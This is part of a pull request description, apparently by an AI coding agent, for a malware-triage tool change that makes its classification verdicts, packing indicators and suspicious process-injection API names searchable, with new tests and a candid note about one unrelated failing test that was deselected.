Suspicious imports (process_injection): VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
```

`search(source="binary.triage", query="CreateRemoteThread")` now reaches a line that says what the tool concluded, not just a row in an import table.

## Tests

New `tests/test_triage_verdict_indexing.py` (8 tests). `triage_binary` is driven end to end against a PE fixture with UPX section names and process-injection imports, and the assertions are made on the text that actually reaches `extract_and_index`:

- the classification, every packing indicator and every suspicious API appear in the indexed text;
- the classification appears within the **first 500 characters**, which is what makes it survive the preview;
- the raw rabin2 output is still there (`UPX0`, `"bintype"`) — added to, not replaced.

`make lint format typecheck test` — 808 passed, mypy clean, ruff clean.

**One pre-existing test is failing in my environment for an unrelated reason:** `test_disk_pcap.py::test_size_filtering_skips_large_pcaps` writes a real 200 MB file and hits a filesystem quota here. It fails identically on unmodified `main`, so it is not caused by this change; I deselected it rather than report a clean run I did not get.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
